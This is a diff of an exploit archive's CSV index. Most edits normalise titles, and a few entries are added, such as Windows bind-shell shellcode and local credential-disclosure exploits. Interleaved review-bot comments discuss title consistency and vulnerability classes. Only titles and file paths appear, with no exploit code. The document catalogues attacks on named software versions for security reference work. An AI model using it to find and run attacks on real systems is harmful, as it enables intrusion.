 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0
-29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload",2013-11-10,DevilScreaM,php,webapps,0
+29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps,0
 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0
 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0
@@ -26580,7 +26580,7 @@ id,file,description,date,author,platform,type,port
 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0
 39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0
 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0
-29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0
+29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0
 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0
 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0
 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0
@@ -26979,7 +26979,7 @@ id,file,description,date,author,platform,type,port
 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0
 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
-29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
+29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0
 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0
@@ -27173,7 +27173,7 @@ id,file,description,date,author,platform,type,port
 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
-30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
+30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Bypass Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0
 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
@@ -27602,7 +27602,7 @@ id,file,description,date,author,platform,type,port
 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection",2007-10-11,durito,php,webapps,0
-30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authorization Bypass",2007-10-11,MustLive,cgi,webapps,0
+30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0
 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0
 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - Merchant shop.php SQL Injection",2007-10-11,durito,php,webapps,0
@@ -28144,6 +28144,7 @@ id,file,description,date,author,platform,type,port
 31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
+40356,platforms/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos,0
 31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
@@ -28175,6 +28176,7 @@ id,file,description,date,author,platform,type,port
 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
+40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
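Review bot: The title of the added row 40355 spells the property as `Transform.colorTranform`, which looks like a typo for `Transform.colorTransform`, so a search for the property name will not find this entry. It also uses `Info Leak`, whereas other rows in this index use `Information Disclosure` (row 24025, for example), and this commit is otherwise normalising titles. Suggested title: `"Adobe Flash - Transform.colorTransform Getter Information Disclosure"`. If the misspelling is carried over verbatim from the upstream report, note that in the referenced file rather than in the searchable title.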
@@ -28278,7 +28280,7 @@ id,file,description,date,author,platform,type,port
 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0
 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0
 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0
-31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI redirection",2008-04-23,"Richard Brain",windows,remote,0
+31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0
 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0
 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0
 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
@@ -28362,6 +28364,7 @@ id,file,description,date,author,platform,type,port
 31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+40354,platforms/android/remote/40354.txt,"Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0
 31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
@@ -28427,6 +28430,7 @@ id,file,description,date,author,platform,type,port
 31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
 31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0
+40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
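Review bot: The added 40353 title `Zabbix 2.0 - 3.0.3 - SQL Injection` uses ` - ` both inside the version range and as the separator between product and vulnerability, so anything that splits titles on ` - ` to extract the affected version gets the wrong field. Other rows on this page write ranges with a comparison operator, for example `Linux Kernel 2.6.9 <= 2.6.25` and `FreePBX 13.0.x < 13.0.154`. Assuming 3.0.3 itself is affected, `"Zabbix 2.0 <= 3.0.3 - SQL Injection"` would match that convention and keep version matching during patch triage unambiguous.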
@@ -28702,7 +28706,7 @@ id,file,description,date,author,platform,type,port
 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
-31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
+31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0
 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
@@ -28757,6 +28761,7 @@ id,file,description,date,author,platform,type,port
 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0
 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0
 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+40350,platforms/windows/local/40350.py,"Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0
 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0
@@ -28818,6 +28823,7 @@ id,file,description,date,author,platform,type,port
 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0
 31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
+40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0
@@ -28893,7 +28899,7 @@ id,file,description,date,author,platform,type,port
 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0
 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0
 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0
-32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload",2014-03-03,"Christian Catalano",php,webapps,0
+32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps,0
 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0
 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0
@@ -29295,7 +29301,7 @@ id,file,description,date,author,platform,type,port
 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
-32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443
+32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorisation",2014-03-26,Metasploit,linux,remote,443
 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i Parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0
 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0
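Review bot: The new 32515 title spells the weakness `Missing Authorisation`, which no longer matches the CWE-862 name "Missing Authorization", so a literal search of the index for the CWE term misses this row. Whether the rest of the file is being moved to the same spelling is not visible from this hunk. If the index is meant to be grep-able by weakness class, I would keep the weakness name as published, `users/update_roles Missing Authorization`, or at least apply one spelling to every row.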
@@ -30100,7 +30106,7 @@ id,file,description,date,author,platform,type,port
 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0
 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0
 33365,platforms/php/webapps/33365.txt,"WordPress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0
-40345,platforms/php/webapps/40345.txt,"Freepbx 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0
+40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0
 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0
 33367,platforms/php/webapps/33367.txt,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0
 33368,platforms/php/webapps/33368.html,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0
@@ -30414,6 +30420,7 @@ id,file,description,date,author,platform,type,port
 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0
 40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0
+40351,platforms/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80
 33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0
 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component - 'maintree' Parameter Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0
@@ -30469,6 +30476,7 @@ id,file,description,date,author,platform,type,port
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0
+40352,platforms/win_x86/shellcode/40352.c,"Windows x86 - Bind Shell TCP Shellcode",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0
 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0
 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0
@@ -30631,7 +30639,7 @@ id,file,description,date,author,platform,type,port
 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0
 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80
-33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80
+33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload",2014-07-07,Metasploit,php,remote,80
 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0
 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0
 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0
@@ -30742,8 +30750,8 @@ id,file,description,date,author,platform,type,port
 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0
-34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
-34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
+34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
+34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0
 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0
@@ -31412,7 +31420,7 @@ id,file,description,date,author,platform,type,port
 34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21
 34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injections",2014-10-02,Portcullis,php,webapps,80
 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443
-34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
+34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80
 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0
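Review bot: The 34865 title goes from `Authorization Bypass` to `Authentication Bypass`, which changes the recorded vulnerability class rather than the wording. An authentication bypass means identity is never verified, while an authorization bypass means a verified identity can act beyond its permissions, and the two lead to different exposure assessments and mitigations. Nothing in this hunk shows which one the advisory in `34865.txt` describes, so the new title should be confirmed against that file before merging. If the rename came from a bulk terminology pass, the other rows it touched deserve the same check.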
@@ -31635,7 +31643,7 @@ id,file,description,date,author,platform,type,port
 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference",2014-10-28,Metasploit,windows,local,0
-35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
+35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0
 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0
 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
@@ -31682,7 +31690,7 @@ id,file,description,date,author,platform,type,port
 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
